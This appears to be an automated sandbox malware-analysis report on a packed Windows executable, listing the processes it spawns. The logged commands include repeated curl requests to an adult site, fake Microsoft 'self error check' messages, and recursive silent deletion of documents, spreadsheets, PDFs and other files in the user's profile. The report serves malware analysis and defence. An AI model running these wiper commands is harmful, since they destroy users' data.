Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Microsoft Windows 10 self error check has been ready...Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2015 Microsoft CorporationJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Copyright (C) 2003-2021 Adobe CorporationJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo DO NOT STOP THE PROCESSJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo Wait a minute...Jump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c @echo OFFJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.doc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pdf c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.csv c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xls c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.ppt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtd c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.txt c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.exe c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.log c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dot c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -e https://www.xvideos.com -A 'Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko / 20100101 Firefox / 66.0' https://www.xvideos.com/video64080443/_ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: unknown unknownJump to behavior
Source: Z0hOr2pD7k.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeCode function: 0_2_00A528C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00A528C0
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installationShow sources
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptm c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jtdc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.jttc c:\users\%username%\ > nul
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.docx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.dotx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsx c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.xlsm c:\users\%username%\ > nulJump to behavior
Source: C:\Users\user\Desktop\Z0hOr2pD7k.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c del /S /Q *.pptx c:\users\%username%\ > nulJump to behavior
